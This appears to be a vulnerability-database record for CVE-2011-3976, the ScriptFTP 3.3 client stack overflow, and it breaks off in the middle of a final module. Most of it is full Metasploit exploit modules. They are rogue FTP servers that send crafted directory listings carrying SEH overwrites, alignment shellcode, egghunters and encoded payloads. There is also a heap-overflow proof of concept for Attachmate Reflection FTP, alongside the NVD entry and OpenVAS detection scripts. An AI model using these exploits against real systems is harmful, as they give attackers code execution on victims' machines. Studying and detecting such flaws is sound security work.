{"id": "EDB-ID:17904", "type": "exploitdb", "bulletinFamily": "exploit", "title": "ScriptFTP 3.3 - Remote Buffer Overflow MSF", "description": "ScriptFTP 3.3 - Remote Buffer Overflow (MSF). CVE-2011-3976. Remote exploit for windows platform", "published": "2011-09-29T00:00:00", "modified": "2011-09-29T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/17904/", "reporter": "otoy", "references": [], "cvelist": ["CVE-2011-3976"], "lastseen": "2016-02-02T08:48:40", "viewCount": 2, "enchantments": {"score": {"value": 7.7, "vector": "NONE", "modified": "2016-02-02T08:48:40", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-3976"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FTP/SCRIPTFTP_LIST"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:105644", "PACKETSTORM:107033"]}, {"type": "exploitdb", "idList": ["EDB-ID:17948", "EDB-ID:17876"]}, {"type": "openvas", "idList": ["OPENVAS:902571", "OPENVAS:1361412562310902571"]}], "modified": "2016-02-02T08:48:40", "rev": 2}, "vulnersScore": 7.7}, "sourceHref": "https://www.exploit-db.com/download/17904/", "sourceData": "#Exploit Title: ScriptFTP 3.3 Remote Buffer Overflow (MSF)\r\n#Date: Sept 20 2011\r\n#Author: otoy\r\n#Version: 3.3\r\n#Tested on: Windows XP SP3\r\n#CVE : -\r\n#EDB-ID: 17876\r\n#Thanks: cyb3r.anbu, spentera-team, dE-team, offsec, exploit-db, corelanc0d3r\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Exploit::Remote::FtpServer\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'ScriptFTP 3.3 Remote Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in ScriptFTP 3.3 ftp client. The overflow is\r\n\t\t\t\ttriggered when the client connects to a FTP server which sends an overly long directory\r\n\t\t\t\tand filename in response to a GETLIST command.\r\n\r\n\t\t\t\tThis will cause an access violation, and will eventually overwrite the saved extended\r\n\t\t\t\tinstruction pointer. \r\n\t\t\t},\r\n\t\t\t'Author' \t =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'modpr0be', \t# Original bug\r\n\t\t\t\t\t'Cyberheb',\t# porting from poc to msf\r\n\t\t\t\t\t'Otoy', \t# final msf module\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => \"0\",\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'OSVDB', '75633'],\r\n\t\t\t\t\t[ 'URL', 'http://www.digital-echidna.org/2011/09/scriptftp-3-3-remote-buffer-overflow-exploit-0day/' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n 'Space' => 1000,\r\n 'DisableNops' => true,\r\n\t\t\t\t\t'EncoderType' => Msf::Encoder::Type::AlphanumMixed,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0d\\x2F\\x5c\\x3c\\x3e\\x5e\\x7e\",\r\n \t\t\t'EncoderOptions' =>\r\n \t\t\t{\r\n \t\t\t\t'BufferRegister' => 'EDX',\r\n \t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows XP Universal', { 'Ret' => \"\\x45\\x5B\", 'Offset' => 1746 } ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Sept 20 2011',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\tend\r\n\r\n\tdef setup\r\n\t\tsuper\r\n\tend\r\n\r\n\tdef on_client_unknown_command(c,cmd,arg)\r\n\t\tc.put(\"200 OK\\r\\n\")\r\n\tend\r\n\r\n\r\n\t#Unicode Encoder\r\n \tdef get_unicode_payload(p)\r\n \tencoder = framework.encoders.create(\"x86/unicode_upper\")\r\n \tencoder.datastore.import_options_from_hash( {'BufferRegister'=>'EAX'} )\r\n \tunicode_payload = encoder.encode(p, nil, nil, platform)\r\n \treturn unicode_payload\r\n \tend\r\n\r\n\r\n\tdef on_client_command_list(c,arg)\r\n\t\tconn = establish_data_connection(c)\r\n\t\tif(not conn)\r\n\t\t\tc.put(\"425 Can't build data connection\\r\\n\")\r\n\t\t\treturn\r\n\t\tend\r\n\t\tprint_status(\" - Data connection set up\")\r\n\t\tcode = 150\r\n\t\tc.put(\"#{code} Here comes the directory listing.\\r\\n\")\r\n\t\tcode = 226\r\n\t\tc.put(\"#{code} Directory send ok.\\r\\n\")\r\n\r\n\r\n\t\tsampahawal = \"A\" * 1746\r\n\t\tnseh = \"\\x61\\x62\"\r\n\t\tseh = target['Ret']\r\n\t\tsampahbawah = 1250\r\n\r\n #prepare for align\r\n \talign = \"\\x60\" #pushad\r\n \talign << \"\\x73\" #nop/align\r\n \talign << \"\\x53\" #push ebx\r\n \talign << \"\\x73\" #nop/align\r\n \talign << \"\\x58\" #pop eax\r\n \talign << \"\\x73\" #nop/align\r\n \talign << \"\\x05\\x02\\x11\" #add eax,0x11000200\r\n \talign << \"\\x73\" #nop/align\r\n \talign << \"\\x2d\\x01\\x11\" #sub eax,0x11000120\r\n \talign << \"\\x73\" #nop/align\r\n\r\n\t\t#align after egg\r\n \talign2 = \"\\x73\\x57\\x73\\x58\\x73\" #nop/push edi/nop/pop eax/nop\r\n \talign2 << \"\\xb9\\x1b\\xaa\" #mov ecx,0xaa001b00\r\n \talign2 << \"\\xe8\\x73\" #add al,ch + nop\r\n \talign2 << \"\\x50\\x73\\xc3\" #push eax,nop,ret\r\n\r\n \t#walking\r\n \twalk = \"\\x50\" #push eax\r\n \twalk << \"\\x73\" #nop/align\r\n \t walk << \"\\xc3\" #ret\r\n\r\n\t\t#egghunter\r\n \tegghunter = \"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYA\"\r\n egghunter << \"IAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA5\"\r\n egghunter << \"8AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZB\"\r\n egghunter << \"ABABABAB30APB944JBQVCQGZKOLO12PRQZKR1\"\r\n egghunter << \"HXMNNOLKUQJRTJO6XKPNPKP44TKJZ6O3EJJ6O\"\r\n egghunter << \"SEYWKOYWA\"\r\n\r\n\t\t#junk\r\n\t\tsampah1 = \"\\x44\" * 106 + \"\\x73\"\r\n\t\tsampah2 = \"\\x42\" * 544\r\n\r\n\t\t#egg\r\n\t\ttelur = \"0t0t\"\r\n\t\t\r\n\t\t#payload\r\n\t\tstubget = \"\\x89\\xe1\\xdb\\xcc\\xd9\\x71\\xf4\\x5a\\x83\\xc2\\x41\\x83\\xea\\x35\"\r\n\t\tpalpha = stubget + payload.encoded\r\n\t\tpuni = get_unicode_payload(palpha)\r\n\t\t\r\n\t\t#filename\r\n\t\tfilename = sampahawal\r\n\t\tfilename << nseh\r\n\t\tfilename << seh\r\n\t\tfilename << align\r\n\t\tfilename << walk\r\n\t\tfilename << sampah1\r\n\t\tfilename << egghunter\r\n\t\tfilename << sampah2\r\n\t\tfilename << telur\r\n\t\tfilename << align2\r\n\t\tfilename << puni\r\n\t\tfilename << sampah1\r\n\r\n\t\tprint_status(\" - Sending directory list via data connection\")\r\n dirlist = \"-rwxrwxrwx 1 100 0 11111 Jun 11 21:10 #{filename}.txt\\r\\n\"\r\n dirlist << \"drwxrwxrwx 1 100 0 11111 Jun 11 21:10 #{filename}\\r\\n\"\r\n dirlist << \"-rwxrwxrwx 1 100 0 11111 Jun 11 21:10 #{filename}.txt\\r\\n\"\r\n\t\tconn.put(dirlist)\r\n\t\tconn.close\r\n\t\treturn\r\n\tend\r\n\r\nend\r\n", "osvdbidlist": ["75633"]}

{"cve": [{"lastseen": "2020-10-03T11:39:33", "description": "Stack-based buffer overflow in AmmSoft ScriptFTP 3.3 allows remote FTP servers to execute arbitrary code via a long filename in a response to a LIST command, as demonstrated using (1) GETLIST or (2) GETFILE in a ScriptFTP script.", "edition": 3, "cvss3": {}, "published": "2011-10-04T10:55:00", "title": "CVE-2011-3976", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3976"], "modified": "2017-08-29T01:30:00", "cpe": ["cpe:/a:ammsoft:scriptftp:3.3"], "id": "CVE-2011-3976", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3976", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ammsoft:scriptftp:3.3:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:39:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3976"], "description": "This host is installed with ScriptFTP and is prone to buffer\noverflow vulnerability.", "modified": "2018-10-20T00:00:00", "published": "2011-09-23T00:00:00", "id": "OPENVAS:1361412562310902571", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902571", "type": "openvas", "title": "ScriptFTP 'GETLIST' or 'GETFILE' Commands Remote Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_scriptftp_cmd_bof_vuln.nasl 11997 2018-10-20 11:59:41Z mmartin $\n#\n# ScriptFTP 'GETLIST' or 'GETFILE' Commands Remote Buffer Overflow Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902571\");\n script_version(\"$Revision: 11997 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-20 13:59:41 +0200 (Sat, 20 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-23 16:39:49 +0200 (Fri, 23 Sep 2011)\");\n script_bugtraq_id(49707);\n script_cve_id(\"CVE-2011-3976\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"ScriptFTP 'GETLIST' or 'GETFILE' Commands Remote Buffer Overflow Vulnerability\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/46099/\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/17876/\");\n script_xref(name:\"URL\", value:\"http://www.digital-echidna.org/2011/09/scriptftp-3-3-remote-buffer-overflow-exploit-0day/\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to execute\narbitrary code within the context of the application. Failed attacks may cause\na denial of service condition.\");\n script_tag(name:\"affected\", value:\"ScriptFTP version 3.3 and prior.\");\n script_tag(name:\"insight\", value:\"The flaw is due to a boundary error when processing filenames\nwithin a directory listing. This can be exploited to cause a stack-based buffer\noverflow via a specially crafted FTP LIST command response.\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"summary\", value:\"This host is installed with ScriptFTP and is prone to buffer\noverflow vulnerability.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nkey = \"SOFTWARE\\ScriptFTP\";\nif(!registry_key_exists(key:key)) {\n exit(0);\n}\n\npath = registry_get_sz(key:key, item:\"Install_Dir\");\nif(!path){\n exit(0);\n}\n\nversion = fetch_file_version(sysPath:path, file_name:\"ScriptFTP.exe\");\nif(version)\n{\n if(version_is_less_equal(version:version, test_version:\"3.3\")) {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-02T21:13:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3976"], "description": "This host is installed with ScriptFTP and is prone to buffer\noverflow vulnerability.", "modified": "2017-02-20T00:00:00", "published": "2011-09-23T00:00:00", "id": "OPENVAS:902571", "href": "http://plugins.openvas.org/nasl.php?oid=902571", "type": "openvas", "title": "ScriptFTP 'GETLIST' or 'GETFILE' Commands Remote Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_scriptftp_cmd_bof_vuln.nasl 5367 2017-02-20 14:16:52Z cfi $\n#\n# ScriptFTP 'GETLIST' or 'GETFILE' Commands Remote Buffer Overflow Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow remote attackers to execute\narbitrary code within the context of the application. Failed attacks may cause\na denial of service condition.\n\nImpact Level: System/Application\";\n\ntag_affected = \"ScriptFTP version 3.3 and prior.\";\n\ntag_insight = \"The flaw is due to a boundary error when processing filenames\nwithin a directory listing. This can be exploited to cause a stack-based buffer\noverflow via a specially crafted FTP LIST command response.\";\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\";\n\ntag_summary = \"This host is installed with ScriptFTP and is prone to buffer\noverflow vulnerability.\";\n\nif(description)\n{\n script_id(902571);\n script_version(\"$Revision: 5367 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 15:16:52 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-23 16:39:49 +0200 (Fri, 23 Sep 2011)\");\n script_bugtraq_id(49707);\n script_cve_id(\"CVE-2011-3976\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"ScriptFTP 'GETLIST' or 'GETFILE' Commands Remote Buffer Overflow Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/46099/\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/17876/\");\n script_xref(name : \"URL\" , value : \"http://www.digital-echidna.org/2011/09/scriptftp-3-3-remote-buffer-overflow-exploit-0day/\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Confirm Windows\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\n## Confirm ScriptFTP\nkey = \"SOFTWARE\\ScriptFTP\";\nif(!registry_key_exists(key:key)) {\n exit(0);\n}\n\n## Get Installed Path\npath = registry_get_sz(key:key, item:\"Install_Dir\");\nif(!path){\n exit(0);\n}\n\n## Get Version from ScriptFTP.exe\nversion = fetch_file_version(sysPath:path, file_name:\"ScriptFTP.exe\");\nif(version)\n{\n ## Check for ScriptFTP version 3.3 and prior.\n if(version_is_less_equal(version:version, test_version:\"3.3\")) {\n security_message(0);\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:04", "description": "", "published": "2011-11-16T00:00:00", "type": "packetstorm", "title": "Attachmate Reflection FTP Client Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3976"], "modified": "2011-11-16T00:00:00", "id": "PACKETSTORM:107033", "href": "https://packetstormsecurity.com/files/107033/Attachmate-Reflection-FTP-Client-Heap-Overflow.html", "sourceData": "`##################################################################################### \nApplication: Attachmate Reflection FTP Client Heap Overflow \nPlatforms: Windows \nExploitation: Remote code execution \nCVE Number: \n{PRL}: 2011-09 \nAuthor: Francis Provencher (Protek Research Lab's) \nWebsite: http://www.protekresearchlab.com/ \nTwitter: @ProtekResearch \n##################################################################################### \n1) Introduction \n2) Timeline \n3) Technical details \n4) PoC \n##################################################################################### \n \n=============== \n1) Introduction \n=============== \n \nAttachmate Corporation is a software company owned by an investment group led by Francisco Partners, \nGolden Gate Capital, and Thoma Cressey Bravo. Attachmate focuses on terminal emulation, legacy modernization, \nmanaged file transfer, and enterprise fraud management software. Attachmate Corporation is a principal holding \nwithin The Attachmate Group. In addition to Attachmate Corporation, The Attachmate Group's other principal \nholdings include NetIQ, Novell, and SUSE. \n \n##################################################################################### \n============================ \n2) Timeline \n============================ \n \n2011-09-26 - Vulnerability reported to vendor \n2011-11-16 - Coordinated public release of advisory \n \n##################################################################################### \n============================ \n3) Technical details \n============================ \n \nThe Reflection FTP client, didn't validate the maximum length of a directory when a LIST command is issuing. \nAn overly long directory name can overflow the heap and corrupt memory. \n \n \n##################################################################################### \n \n=========== \n4) The Code \n=========== \n \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::FtpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Attachmate Reflection FTP Client Heap Overflow (LIST)', \n'Description' => %q{ \nThis module exploits an heap buffer overflow in Attachmate Reflection FTP Client, \ntriggered when processing the response on a LIST command. \n}, \n'Author' => \n[ \n'Francis Provencher', \n], \n'License' => MSF_LICENSE, \n'Version' => \"$Revision: 12196 $\", \n'References' => \n[ \n[ 'URL', 'http://www.protekresearchlab.com/' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Payload' => \n{ \n'BadChars' => \"\\x00\\xff\\x0d\\x5c\\x2f\\x0a\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'XP SP3 Universal', { 'Offset' => 300, } ], \n], \n'Privileged' => false, \n'DisclosureDate' => 'November 16 2011', \n'DefaultTarget' => 0)) \n \nend \n \ndef setup \nsuper \nend \n \ndef on_client_unknown_command(c,cmd,arg) \nc.put(\"200 OK\\r\\n\") \nend \n \ndef on_client_command_list(c,arg) \n \nconn = establish_data_connection(c) \nif(not conn) \nc.put(\"425 Can't build data connection\\r\\n\") \nreturn \nend \nprint_status(\" - Data connection set up\") \ncode = 150 \nc.put(\"#{code} Here comes the directory listing.\\r\\n\") \ncode = 226 \nc.put(\"#{code} Directory send ok.\\r\\n\") \n \nfilename = \"A\" * 296 \n \njunk = \"DCBA\" \n \nbuffer = filename + junk \nprint_status(\" - Sending directory list via data connection\") \ndirlist = \"-rw-rw-r-- 1 1176 1176 1060 sep 27 22:22 #{buffer}\\r\\n\" \nconn.put(dirlist) \nconn.close \nprint_status(\" Movzx eax, byte ptr edx ds:0023:41424344 ...\") \nreturn \n \nend \n \nend \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/107033/attachmatereflection-overflow.txt"}, {"lastseen": "2016-12-05T22:24:59", "description": "", "published": "2011-10-10T00:00:00", "type": "packetstorm", "title": "ScriptFTP 3.3 Remote Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3976"], "modified": "2011-10-10T00:00:00", "id": "PACKETSTORM:105644", "href": "https://packetstormsecurity.com/files/105644/ScriptFTP-3.3-Remote-Buffer-Overflow.html", "sourceData": "`## \n# $Id: scriptftp_list.rb 13848 2011-10-09 22:56:17Z sinn3r $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::FtpServer \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::Egghunter \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ScriptFTP <= 3.3 Remote Buffer Overflow (LIST)', \n'Description' => %q{ \nAmmSoft's ScriptFTP client is susceptible to a remote buffer overflow \nvulnerability that is triggered when processing a sufficiently long filename during \na FTP LIST command resulting in overwriting the exception handler. Social engineering \nof executing a specially crafted ftp file by double click will result in connecting to \nour malcious server and perform arbitrary code execution which allows the attacker \nto gain the same rights as the user running ScriptFTP. \n}, \n'License' => MSF_LICENSE, \n'Version' => \"$Revision: 13848 $\", \n'Author' => \n[ \n'modpr0be', #Vulnerability discovery and original exploit \n'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module \n'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2011-3976' ], \n[ 'OSVDB', '75633' ], \n[ 'URL', 'http://www.exploit-db.com/exploits/17876/' ], \n[ 'URL', 'http://www.kb.cert.org/vuls/id/440219' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n'DisablePayloadHandler' => 'false', \n}, \n'Payload' => \n{ \n'BadChars' => \"\\x00\\xff\\x0d\\x5c\\x2f\\x0a\", \n'EncoderType' => Msf::Encoder::Type::AlphanumMixed, \n'EncoderOptions' => \n{ \n'BufferRegister' => 'EDI', # Egghunter jmp edi \n} \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# CALL DWORD PTR SS:[EBP-4] \n# scriptftp.exe - File version=Build 3/9/2009 \n[ 'Windows XP SP3 / Windows Vista', { 'Offset' => 1746, 'Ret' => \"\\xd6\\x41\" } ], \n], \n'Privileged' => false, \n'DisclosureDate' => 'Oct 12 2011', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.ftp']), \n], self.class) \n \nend \n \ndef setup \nif datastore['SRVHOST'] == '0.0.0.0' \nlhost = Rex::Socket.source_address('50.50.50.50') \nelse \nlhost = datastore['SRVHOST'] \nend \n \nftp_file = \"OPENHOST('#{lhost}','ftp','ftp')\\r\\n\" \nftp_file << \"SETPASSIVE(ENABLED)\\r\\n\" \nftp_file << \"GETLIST($list,REMOTE_FILES)\\r\\n\" \nftp_file << \"CLOSEHOST\\r\\n\" \n \nprint_status(\"Creating '#{datastore['FILENAME']}'...\") \nfile_create(ftp_file) \nsuper \nend \n \n \ndef on_client_unknown_command(c,cmd,arg) \nc.put(\"200 OK\\r\\n\") \nend \n \ndef on_client_command_list(c,arg) \n \nconn = establish_data_connection(c) \nif(not conn) \nc.put(\"425 Can't build data connection\\r\\n\") \nreturn \nend \n \nprint_status(\" - Data connection set up\") \ncode = 150 \nc.put(\"#{code} Here comes the directory listing.\\r\\n\") \n \ncode = 226 \nc.put(\"#{code} Directory send ok.\\r\\n\") \n \neggoptions = \n{ \n:checksum => false, \n:eggtag => 'cure' \n} \n \nhunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions) \n \n# Encode with alphamixed, then unicode mixed \n[ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name| \nenc = framework.encoders.create(name) \nif name =~ /unicode/ \n# aligned to ESP & EAX \nenc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' }) \nelse \nenc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' }) \nend \n# NOTE: we already eliminated badchars \nhunter = enc.encode(hunter, nil, nil, platform) \nif name =~/alpha/ \n#insert getpc_stub & align EDX, unicode encoder friendly. \n#Hardcoded stub is not an issue here because it gets encoded anyway \ngetpc_stub = \"\\x89\\xe1\\xdb\\xcc\\xd9\\x71\\xf4\\x5a\\x83\\xc2\\x41\\x83\\xea\\x35\" \nhunter = getpc_stub + hunter \nend \n} \n \nunicode_nop = \"\\x6d\" # DD BYTE PTR DS:[ECX],AL \n \nnseh = \"\\x61\" << unicode_nop \nseh = target.ret \n \nalignment = \"\\x54\" # PUSH ESP \nalignment << unicode_nop \nalignment << \"\\x58\" # POP EAX \nalignment << unicode_nop \nalignment << \"\\x05\\x12\\x11\" # ADD EAX,11001200 \nalignment << unicode_nop \nalignment << \"\\x2d\\x01\\x01\" # SUB EAX,1000100 \nalignment << unicode_nop \nalignment << \"\\x2d\\x01\\x10\" # SUB EAX,10000100 \nalignment << unicode_nop \nalignment << \"\\x50\" # PUSH EAX \nalignment << unicode_nop \nalignment << \"\\xc3\" # RETN \n \nbuffer = rand_text_alpha(656) \nbuffer << hunter \nbuffer << rand_text_alpha(target['Offset']-buffer.length) \nbuffer << nseh \nbuffer << seh \nbuffer << alignment \nbuffer << rand_text_alpha(500) \nbuffer << egg \n \nprint_status(\" - Sending directory list via data connection\") \ndirlist = \"-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\\r\\n\" \ndirlist << \" 5 ftpuser ftpusers 512 Jul 26 2001 A\\r\\n\" \ndirlist << \"rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\\r\\n\" \n \nconn.put(dirlist) \nconn.close \nreturn \nend \n \nend \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/105644/scriptftp_list.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-02T08:53:24", "description": "ScriptFTP. CVE-2011-3976. Remote exploit for windows platform", "published": "2011-10-09T00:00:00", "type": "exploitdb", "title": "ScriptFTP <= 3.3 - Remote Buffer Overflow LIST", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3976"], "modified": "2011-10-09T00:00:00", "id": "EDB-ID:17948", "href": "https://www.exploit-db.com/exploits/17948/", "sourceData": "##\r\n# $Id: scriptftp_list.rb 13841 2011-10-09 05:36:42Z sinn3r $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::FtpServer\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\tinclude Msf::Exploit::Egghunter\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'ScriptFTP <= 3.3 Remote Buffer Overflow (LIST)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tAmmSoft's ScriptFTP client is 